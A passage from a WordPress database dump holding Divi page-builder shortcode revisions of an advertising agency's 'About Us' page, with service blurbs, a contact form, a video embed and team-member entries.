animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Packaging Design\" title_text=\"packaging design by what the hell\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Packaging Design creative agency\" title_text=\"packaging design creative advertising agency\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\" alt=\"Creative graphic designing \" title_text=\"Creative graphic designing \"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"View All\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#f7f7f7\" button_border_width=\"4px\" button_border_color=\"#f7f7f7\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#fcd21d\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" hover_enabled=\"0\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field fullwidth_field=\"on\" _builder_version=\"4.5.2\" _module_preset=\"default\" field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" hover_enabled=\"0\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','about-us','','inherit','closed','closed','','392-revision-v1','','','2020-08-07 19:25:06','2020-08-07 19:25:06','',392,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/392-revision-v1/',0,'revision','',0),(554,1,'2020-08-07 19:25:23','2020-08-07 19:25:23','[et_pb_section fb_built=\"1\" admin_label=\"Page Header\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>About US</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"About Us Section\" _builder_version=\"4.5.2\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/WhyWE.jpg\" custom_margin=\"|5%||5%\" custom_margin_tablet=\"\" custom_margin_phone=\"|0px||0px\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%|||\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"5%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-200px\" box_shadow_color=\"#ffffff\" alt=\"about WhatTheHell?\" title_text=\"whatthehell about us\" parallax=\"on\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"About Us Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"27px|0px|0px|0px\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_color=\"#f7f7f7\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"10%|10%|10%|10%\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" box_shadow_style=\"preset1\" box_shadow_vertical=\"15px\" box_shadow_blur=\"45px\" box_shadow_color=\"rgba(0,0,0,0.15)\" locked=\"off\"]<h2>Build Brand Equity</h2>\n<p>Our advertising and marketing startegies are aligned towards the core objectives of the business operation of sustainable sales leading to profit and building brand equity as long term asset creation for the businesses.</p>\n<p><span style=\"font-size: 16px;\">There is a need to understand the various phases of businesses &amp; invest in marketing (Sales or Brand Building) in the required proportion. As per the budget of the business we can align our marketing and advertising strategies into aggressive disruptive to guerilla or safe. As the successful advertising and marketing require patience and balancing various market forces to help your business thrust to an upward direction.</span></p>\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"56px||56px|||\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"56px|0px|56px|0px|false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"4%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_font=\"||||||||\" text_text_color=\"#353740\" text_font_size=\"24px\" text_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\" hover_enabled=\"0\"]<p><span>With the advent to this digital era, <strong>Unique traffic to your website</strong>, is becoming the key battle point. Targeting the appropriate TG and reaching to them at the right place and the moment can help you earn them for lifetime.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#d4b068\" background_color_gradient_end=\"#ffffff\" background_color_gradient_start_position=\"30%\" background_color_gradient_end_position=\"30%\" custom_padding=\"0px||56px||false|false\" hover_enabled=\"0\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"0px|0px|0px|0px\" animation_direction=\"top\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=GQB6K7Dozms\" image_src=\"//i.ytimg.com/vi/GQB6K7Dozms/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Team Member Section\" _builder_version=\"3.22\" custom_padding=\"110px||60px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#353740\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Fearless Leaeders</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>We do not fear trying new stuff and failure (we say learning). Meet the <span>team of professionals enjoying their work and adding value to your project.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||15px|\" hover_enabled=\"0\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Dhiraj Kumar\" position=\"Founder\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard.jpg\" linkedin_url=\"https://www.linkedin.com/in/dhirajwth\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" hover_enabled=\"0\" alt=\"dhiraj kumar founder \" title_text=\"dhiraj kumar whatthehell?\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Christina Foster\" position=\"Creative Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-06.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"100ms\" hover_enabled=\"0\" locked=\"off\" alt=\"dhiraj kumar founder \" title_text=\"travel-portrait-06\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Jason Wardak\" position=\"Visual Media\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-04.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"200ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Other Recent Works Section\" _builder_version=\"3.22\" background_color=\"#353740\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#d4b068\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_color=\"#d4b068\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#d4b068\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>our Work</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#f7f7f7\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" admin_label=\"Other Recent Works Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" use_custom_width=\"on\" 